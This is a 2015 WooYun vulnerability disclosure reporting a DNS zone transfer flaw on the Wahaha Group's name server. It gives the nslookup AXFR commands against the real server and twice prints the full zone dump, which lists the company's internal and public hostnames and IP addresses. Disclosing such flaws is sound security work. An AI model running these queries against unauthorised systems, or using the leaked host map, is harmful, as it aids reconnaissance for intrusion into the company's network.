当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123414

漏洞标题:娃哈哈集团存在域传输漏洞

相关厂商:wahaha.com.cn

漏洞作者: 路人甲

提交时间:2015-06-29 14:01

修复时间:2015-07-04 14:02

公开时间:2015-07-04 14:02

漏洞类型:系统/服务运维配置不当

危害等级:低

自评Rank:3

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

nslookup==>指定server为ns.wahaha.com.cn==>设置类型为axfr.之后如下


> set type=axfr
> ls -d wahaha.com.cn
[ns.wahaha.com.cn]
 wahaha.com.cn.                 SOA    sanweb.wahaha.com.cn root.wahaha.com.cn
(964089799 10800 3600 604800 86400)
 wahaha.com.cn.                 MX     0    tst.wahaha.com.cn
 wahaha.com.cn.                 NS     ns.wahaha.com.cn
 wahaha.com.cn.                 NS     sanweb.wahaha.com.cn
 2013oa                         A      192.200.8.86
 a8303c3a641fbcb4c2e0e811d9baa5f5 CNAME  verify.wooyun.org
 aerla                          A      192.200.1.41
 app                            A      192.200.2.234
 apps                           A      192.200.16.171
 apptest                        A      192.200.2.27
 audit                          A      192.200.8.220
 cas                            A      192.200.1.248
 cf                             CNAME  lo.wahaha.com.cn
 cfh                            A      192.200.2.67
 clothing                       A      122.224.103.84
 clothingh                      A      192.200.2.214
 club                           CNAME  www.wahaha.com.cn
 dns.itcitc.wahaha.com.cn       A      192.200.10.8
 cproject                       A      192.200.1.178
 cus                            A      192.200.4.21
 da                             A      192.200.1.23
 dangjian                       A      192.200.1.212
 data                           A      192.200.8.91
 dee                            A      192.200.1.80
 doc                            CNAME  data.wahaha.com.cn
 domino                         MX     0    dominotst.wahaha.com.cn
 mail.domino                    A      192.200.8.53
 dominotst                      A      192.200.8.58
 e                              A      192.200.2.24
 edison                         A      122.224.103.77
 education                      A      122.224.103.72
 education1                     CNAME  www.wahaha.com.cn
 ehr                            A      192.200.1.63
 en                             CNAME  www.wahaha.com.cn
 food.en                        CNAME  www.wahaha.com.cn
 future.en                      CNAME  www.wahaha.com.cn
 health.en                      CNAME  www.wahaha.com.cn
 milk.en                        CNAME  www.wahaha.com.cn
 tea.en                         CNAME  www.wahaha.com.cn
 water.en                       CNAME  www.wahaha.com.cn
 ep                             A      122.224.103.69
 ep1                            A      192.200.2.76
 ep2                            A      124.160.32.37
 epbak                          A      202.107.206.221
 epbak2                         A      221.12.6.158
 ephome                         A      192.200.2.77
 eptest                         A      192.200.1.106
 erp6                           CNAME  pre.wahaha.com.cn
 erp6-a                         A      192.200.1.28
 erp6-app1                      A      192.200.1.32
 erp6-app2                      A      192.200.1.33
 erp6-app3                      A      192.200.1.34
 erp6-app4                      A      192.200.1.35
 erp6-b                         A      192.200.1.29
 fgs                            A      192.200.1.236
 food                           CNAME  www.wahaha.com.cn
 future                         CNAME  www.wahaha.com.cn
 fys                            CNAME  www.wahaha.com.cn
 gcb                            A      192.200.1.198
 guazi                          CNAME  www.wahaha.com.cn
 guoru                          CNAME  www.wahaha.com.cn
 health                         CNAME  www.wahaha.com.cn
 helloc                         CNAME  www.wahaha.com.cn
 hmz                            CNAME  home.wahaha.com.cn
 home                           A      192.200.2.25
 hr                             A      192.200.2.26
 hr1                            A      122.224.103.71
 hr2                            A      124.160.32.39
 hrtest                         A      192.200.2.126
 ides                           A      192.200.8.17
 imss                           CNAME  tst.wahaha.com.cn
 infovideo                      A      192.200.8.105
 inserver                       A      61.153.6.59
 iom                            A      192.200.1.118
 itcitc                         NS     dns.itcitc.wahaha.com.cn
 jijian                         A      122.224.103.81
 jijian1                        A      124.160.32.44
 jijianh                        A      192.200.2.78
 joinus                         CNAME  love.wahaha.com.cn
 joinus2                        CNAME  hr1.wahaha.com.cn
 joinus2h                       CNAME  hr.wahaha.com.cn
 joinush                        A      192.200.2.29
 juice                          CNAME  www.wahaha.com.cn
 kb                             CNAME  hr.wahaha.com.cn
 kb2                            CNAME  hrtest.wahaha.com.cn
 kids                           A      122.224.103.88
 kidsh                          A      192.200.2.46
 kp                             A      192.200.2.67
 lile                           CNAME  www.wahaha.com.cn
 ljg                            CNAME  www.wahaha.com.cn
 lo                             A      122.224.103.78
 love                           A      122.224.103.76
 m                              A      192.200.1.181
 mail                           A      61.153.6.59
 mailold                        A      202.107.206.218
 mailtest                       A      192.200.8.185
 manage                         CNAME  www.wahaha.com.cn
 manage2                        A      192.200.1.109
 mengxiang                      A      122.224.103.76
 mes                            A      192.200.1.101
 mes1                           A      192.200.1.101
 mes2                           A      192.200.1.177
 mes3                           A      192.200.1.212
 mestest1                       A      192.200.1.176
 milk                           CNAME  www.wahaha.com.cn
 mix                            CNAME  kp.wahaha.com.cn
 mobile                         A      61.153.6.60
 mofa                           A      192.200.1.13
 mofb                           A      192.200.1.16
 netscreen                      A      192.168.1.2
 new                            CNAME  lo.wahaha.com.cn
 ns                             A      60.12.5.28
 OAServer                       A      192.200.2.25
 pi                             A      192.200.8.42
 pi2                            A      192.200.8.43
 pom                            A      122.224.103.72
 pomh                           A      192.200.2.234
 popmail                        A      192.200.8.184
 portal                         A      192.200.1.105
 pre                            A      192.200.1.26
 q1                             CNAME  jijianh.wahaha.com.cn
 q7                             CNAME  jijian.wahaha.com.cn
 q71                            CNAME  jijian1.wahaha.com.cn
 q7h                            CNAME  jijianh.wahaha.com.cn
 qae                            A      192.200.1.81
 qcs                            CNAME  mes.wahaha.com.cn
 sale                           CNAME  salet.wahaha.com.cn
 sale2                          CNAME  saleu.wahaha.com.cn
 sale3                          A      202.107.206.217
 sale4                          A      221.12.6.152
 saleh                          A      192.200.2.39
 salet                          A      122.224.103.79
 saleu                          A      124.160.32.60
 sametime                       A      61.175.197.141
 sanweb                         A      61.153.6.58
 scm                            CNAME  lo.wahaha.com.cn
 shwater                        CNAME  www.wahaha.com.cn
 slm                            A      192.200.8.19
 smtp                           A      61.153.6.58
 spmis                          A      192.200.11.253
 srm                            A      122.224.103.87
 srm2                           A      124.160.32.57
 srmh                           A      192.200.2.100
 ss                             CNAME  kp.wahaha.com.cn
 ssl                            A      192.200.8.111
 ssl1                           A      122.224.103.91
 ssl2                           A      124.160.32.59
 sslh                           A      192.200.2.253
 sunfire                        A      192.200.4.21
 svn                            A      192.200.1.36
 tea                            CNAME  www.wahaha.com.cn
 test                           MX     0    mailtest.wahaha.com.cn
 tst                            A      61.175.197.139
 tz                             CNAME  www.wahaha.com.cn
 tzMallApp                      CNAME  hr.wahaha.com.cn
 tzs                            CNAME  srm.wahaha.com.cn
 tzsh                           CNAME  srmh.wahaha.com.cn
 uyo                            CNAME  www.wahaha.com.cn
 v2                             A      192.200.8.140
 w9                             A      192.200.1.18
 water                          CNAME  www.wahaha.com.cn
 wccl                           A      122.224.103.72
 wccl2                          A      124.160.32.40
 wcclh                          A      192.200.2.234
 wcclpos                        A      192.200.1.210
 whh                            A      192.200.2.24
 whhtz                          A      122.224.103.83
 whhtzh                         A      192.200.2.219
 www                            A      122.224.103.73
 wx                             A      124.160.32.58
 wxh                            A      192.200.2.28
 xcc                            CNAME  www.wahaha.com.cn
 xsep                           A      122.224.103.70
 youyou                         CNAME  love.wahaha.com.cn
 zd                             A      122.224.103.70
 zjssg                          CNAME  jijian.wahaha.com.cn
 zjssg1                         CNAME  jijian1.wahaha.com.cn
 zjssgh                         CNAME  jijianh.wahaha.com.cn
 wahaha.com.cn.                 SOA    sanweb.wahaha.com.cn root.wahaha.com.cn
(964089799 10800 3600 604800 86400)
>

漏洞证明:

C:\Users\XXX>nslookup
默认服务器:  google-public-dns-a.g
Address:  8.8.8.8
> server ns.wahaha.com.cn
默认服务器:  ns.wahaha.com.cn
Address:  60.12.5.28
> set type=axfr
> ls -d wahaha.com.cn
[ns.wahaha.com.cn]
 wahaha.com.cn.                 SOA    sanweb.wahaha.com.cn root.wahaha.com.cn
(964089799 10800 3600 604800 86400)
 wahaha.com.cn.                 MX     0    tst.wahaha.com.cn
 wahaha.com.cn.                 NS     ns.wahaha.com.cn
 wahaha.com.cn.                 NS     sanweb.wahaha.com.cn
 2013oa                         A      192.200.8.86
 a8303c3a641fbcb4c2e0e811d9baa5f5 CNAME  verify.wooyun.org
 aerla                          A      192.200.1.41
 app                            A      192.200.2.234
 apps                           A      192.200.16.171
 apptest                        A      192.200.2.27
 audit                          A      192.200.8.220
 cas                            A      192.200.1.248
 cf                             CNAME  lo.wahaha.com.cn
 cfh                            A      192.200.2.67
 clothing                       A      122.224.103.84
 clothingh                      A      192.200.2.214
 club                           CNAME  www.wahaha.com.cn
 dns.itcitc.wahaha.com.cn       A      192.200.10.8
 cproject                       A      192.200.1.178
 cus                            A      192.200.4.21
 da                             A      192.200.1.23
 dangjian                       A      192.200.1.212
 data                           A      192.200.8.91
 dee                            A      192.200.1.80
 doc                            CNAME  data.wahaha.com.cn
 domino                         MX     0    dominotst.wahaha.com.cn
 mail.domino                    A      192.200.8.53
 dominotst                      A      192.200.8.58
 e                              A      192.200.2.24
 edison                         A      122.224.103.77
 education                      A      122.224.103.72
 education1                     CNAME  www.wahaha.com.cn
 ehr                            A      192.200.1.63
 en                             CNAME  www.wahaha.com.cn
 food.en                        CNAME  www.wahaha.com.cn
 future.en                      CNAME  www.wahaha.com.cn
 health.en                      CNAME  www.wahaha.com.cn
 milk.en                        CNAME  www.wahaha.com.cn
 tea.en                         CNAME  www.wahaha.com.cn
 water.en                       CNAME  www.wahaha.com.cn
 ep                             A      122.224.103.69
 ep1                            A      192.200.2.76
 ep2                            A      124.160.32.37
 epbak                          A      202.107.206.221
 epbak2                         A      221.12.6.158
 ephome                         A      192.200.2.77
 eptest                         A      192.200.1.106
 erp6                           CNAME  pre.wahaha.com.cn
 erp6-a                         A      192.200.1.28
 erp6-app1                      A      192.200.1.32
 erp6-app2                      A      192.200.1.33
 erp6-app3                      A      192.200.1.34
 erp6-app4                      A      192.200.1.35
 erp6-b                         A      192.200.1.29
 fgs                            A      192.200.1.236
 food                           CNAME  www.wahaha.com.cn
 future                         CNAME  www.wahaha.com.cn
 fys                            CNAME  www.wahaha.com.cn
 gcb                            A      192.200.1.198
 guazi                          CNAME  www.wahaha.com.cn
 guoru                          CNAME  www.wahaha.com.cn
 health                         CNAME  www.wahaha.com.cn
 helloc                         CNAME  www.wahaha.com.cn
 hmz                            CNAME  home.wahaha.com.cn
 home                           A      192.200.2.25
 hr                             A      192.200.2.26
 hr1                            A      122.224.103.71
 hr2                            A      124.160.32.39
 hrtest                         A      192.200.2.126
 ides                           A      192.200.8.17
 imss                           CNAME  tst.wahaha.com.cn
 infovideo                      A      192.200.8.105
 inserver                       A      61.153.6.59
 iom                            A      192.200.1.118
 itcitc                         NS     dns.itcitc.wahaha.com.cn
 jijian                         A      122.224.103.81
 jijian1                        A      124.160.32.44
 jijianh                        A      192.200.2.78
 joinus                         CNAME  love.wahaha.com.cn
 joinus2                        CNAME  hr1.wahaha.com.cn
 joinus2h                       CNAME  hr.wahaha.com.cn
 joinush                        A      192.200.2.29
 juice                          CNAME  www.wahaha.com.cn
 kb                             CNAME  hr.wahaha.com.cn
 kb2                            CNAME  hrtest.wahaha.com.cn
 kids                           A      122.224.103.88
 kidsh                          A      192.200.2.46
 kp                             A      192.200.2.67
 lile                           CNAME  www.wahaha.com.cn
 ljg                            CNAME  www.wahaha.com.cn
 lo                             A      122.224.103.78
 love                           A      122.224.103.76
 m                              A      192.200.1.181
 mail                           A      61.153.6.59
 mailold                        A      202.107.206.218
 mailtest                       A      192.200.8.185
 manage                         CNAME  www.wahaha.com.cn
 manage2                        A      192.200.1.109
 mengxiang                      A      122.224.103.76
 mes                            A      192.200.1.101
 mes1                           A      192.200.1.101
 mes2                           A      192.200.1.177
 mes3                           A      192.200.1.212
 mestest1                       A      192.200.1.176
 milk                           CNAME  www.wahaha.com.cn
 mix                            CNAME  kp.wahaha.com.cn
 mobile                         A      61.153.6.60
 mofa                           A      192.200.1.13
 mofb                           A      192.200.1.16
 netscreen                      A      192.168.1.2
 new                            CNAME  lo.wahaha.com.cn
 ns                             A      60.12.5.28
 OAServer                       A      192.200.2.25
 pi                             A      192.200.8.42
 pi2                            A      192.200.8.43
 pom                            A      122.224.103.72
 pomh                           A      192.200.2.234
 popmail                        A      192.200.8.184
 portal                         A      192.200.1.105
 pre                            A      192.200.1.26
 q1                             CNAME  jijianh.wahaha.com.cn
 q7                             CNAME  jijian.wahaha.com.cn
 q71                            CNAME  jijian1.wahaha.com.cn
 q7h                            CNAME  jijianh.wahaha.com.cn
 qae                            A      192.200.1.81
 qcs                            CNAME  mes.wahaha.com.cn
 sale                           CNAME  salet.wahaha.com.cn
 sale2                          CNAME  saleu.wahaha.com.cn
 sale3                          A      202.107.206.217
 sale4                          A      221.12.6.152
 saleh                          A      192.200.2.39
 salet                          A      122.224.103.79
 saleu                          A      124.160.32.60
 sametime                       A      61.175.197.141
 sanweb                         A      61.153.6.58
 scm                            CNAME  lo.wahaha.com.cn
 shwater                        CNAME  www.wahaha.com.cn
 slm                            A      192.200.8.19
 smtp                           A      61.153.6.58
 spmis                          A      192.200.11.253
 srm                            A      122.224.103.87
 srm2                           A      124.160.32.57
 srmh                           A      192.200.2.100
 ss                             CNAME  kp.wahaha.com.cn
 ssl                            A      192.200.8.111
 ssl1                           A      122.224.103.91
 ssl2                           A      124.160.32.59
 sslh                           A      192.200.2.253
 sunfire                        A      192.200.4.21
 svn                            A      192.200.1.36
 tea                            CNAME  www.wahaha.com.cn
 test                           MX     0    mailtest.wahaha.com.cn
 tst                            A      61.175.197.139
 tz                             CNAME  www.wahaha.com.cn
 tzMallApp                      CNAME  hr.wahaha.com.cn
 tzs                            CNAME  srm.wahaha.com.cn
 tzsh                           CNAME  srmh.wahaha.com.cn
 uyo                            CNAME  www.wahaha.com.cn
 v2                             A      192.200.8.140
 w9                             A      192.200.1.18
 water                          CNAME  www.wahaha.com.cn
 wccl                           A      122.224.103.72
 wccl2                          A      124.160.32.40
 wcclh                          A      192.200.2.234
 wcclpos                        A      192.200.1.210
 whh                            A      192.200.2.24
 whhtz                          A      122.224.103.83
 whhtzh                         A      192.200.2.219
 www                            A      122.224.103.73
 wx                             A      124.160.32.58
 wxh                            A      192.200.2.28
 xcc                            CNAME  www.wahaha.com.cn
 xsep                           A      122.224.103.70
 youyou                         CNAME  love.wahaha.com.cn
 zd                             A      122.224.103.70
 zjssg                          CNAME  jijian.wahaha.com.cn
 zjssg1                         CNAME  jijian1.wahaha.com.cn
 zjssgh                         CNAME  jijianh.wahaha.com.cn
 wahaha.com.cn.                 SOA    sanweb.wahaha.com.cn root.wahaha.com.cn
(964089799 10800 3600 604800 86400)
>

修复方案:

修改DNS服务器域传输配置。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-04 14:02

厂商回复:

最新状态:

2015-07-07:已修补

漏洞评价:

评论

  1. 2015-07-07 21:42 | Annabelle ( 实习白帽子 | Rank:46 漏洞数:15 | .)

    我也就是挣俩rank,确认下又不会掉块肉,直接忽略很没面子唉。